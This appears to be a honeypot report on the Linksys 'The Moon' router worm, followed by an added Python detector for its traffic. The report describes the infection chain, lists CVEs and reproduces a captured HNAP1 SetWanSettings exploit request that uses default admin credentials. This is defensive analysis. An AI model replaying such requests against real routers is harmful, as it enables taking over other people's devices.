Linksys "The Moon" Worm
Dest. port: 80
Time: 26/09/2020 06:40:57
ASN/ISP: AS36813 Hamilton County Communications, Inc
Location: Illinois, McLeansboro (zipcode 62859)
The worm appears to extract the router hardware version and the firmware revision. The relevant lines are:
1.0.07 build 1
Next, the worm sends an exploit to a vulnerable CGI script running on these routers. The request does not require authentication: the worm sends random "admin" credentials, but the script never checks them. This second request launches a simple shell script that requests the actual worm. The worm is about 2 MB in size; samples that we captured so far appear pretty much identical but for a random trailer at the end of the binary. The file is an ELF MIPS binary.
Once this code runs, the infected router appears to scan for other victims.
CVEs: CVE-2002-2159, CVE-2008-1247, CVE-2008-1268, CVE-2008-4594, CVE-2009-3341, CVE-2010-1573, CVE-2010-2261, CVE-2008-0228
POST /HNAP1/ HTTP/1.0
Content-Type: text/xml; charset="utf-8"
authorization: Basic YWRtaW46YWRtaW4=
<?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/" soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/"><Type>Static</Type><IPAddress>10.107.18.75</IPAddress><SubnetMask>255.255.255.0</SubnetMask><Gateway>10.107.18.218</Gateway></SetWanSettings></soap:Body></soap:Envelope>
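A small detector for this request pattern, added here as an example and not part of the original report: it parses a raw HTTP request, extracts the HNAP action from the SOAP body and decodes the Basic credentials, so a honeypot or proxy log entry like the capture above can be flagged. The sample request is constructed from the capture on this page with the body trimmed to the elements the detector inspects.

```python
import base64
import xml.etree.ElementTree as ET
# Constructed sample: the HNAP1 request captured on this page, body trimmed to
# the elements the detector inspects.
SAMPLE_REQUEST = (
    "POST /HNAP1/ HTTP/1.0\r\n"
    'Content-Type: text/xml; charset="utf-8"\r\n'
    "authorization: Basic YWRtaW46YWRtaW4=\r\n\r\n"
    '<?xml version="1.0" encoding="utf-8"?>'
    '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">'
    '<soap:Body><SetWanSettings xmlns="http://purenetworks.com/HNAP1/">'
    "<Type>Static</Type></SetWanSettings></soap:Body></soap:Envelope>"
)
SOAP_BODY = "{http://schemas.xmlsoap.org/soap/envelope/}Body"
HNAP_NS = "{http://purenetworks.com/HNAP1/}"

def parse_request(raw):
    # Split a raw HTTP request into method, path, lower-cased headers and body.
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = {n.strip().lower(): v.strip()
               for n, _, v in (l.partition(":") for l in lines[1:])}
    return {"method": method, "path": path, "headers": headers, "body": body}

def hnap_action(body):
    # Local name of the first HNAP action inside the SOAP body, or None.
    try:  # find() may return None (no Body) and Body may be empty
        tag = ET.fromstring(body).find(SOAP_BODY)[0].tag
    except (ET.ParseError, TypeError, IndexError):
        return None
    return tag[len(HNAP_NS):] if tag.startswith(HNAP_NS) else tag

def assess(raw):
    # Flag a POST to /HNAP1/ that changes router state on offered default creds.
    req = parse_request(raw)
    finding = {"action": None, "credentials": None, "reasons": []}
    if req["method"] != "POST" or not req["path"].startswith("/HNAP1"):
        return finding
    finding["action"] = hnap_action(req["body"])
    if finding["action"] and finding["action"].startswith("Set"):
        finding["reasons"].append("state-changing HNAP action " + finding["action"])
    auth = req["headers"].get("authorization", "")
    if auth.lower().startswith("basic "):
        try:  # the captured header decodes to the default admin:admin pair
            finding["credentials"] = base64.b64decode(auth[6:]).decode(errors="replace")
        except ValueError:  # malformed base64 (binascii.Error is a ValueError)
            finding["credentials"] = "<undecodable>"
        if finding["credentials"].split(":", 1)[0] == "admin":
            finding["reasons"].append("default 'admin' username offered")
    return finding
```

Run `assess(SAMPLE_REQUEST)` to see both reasons fire; an ordinary GET or a POST elsewhere returns an empty reasons list.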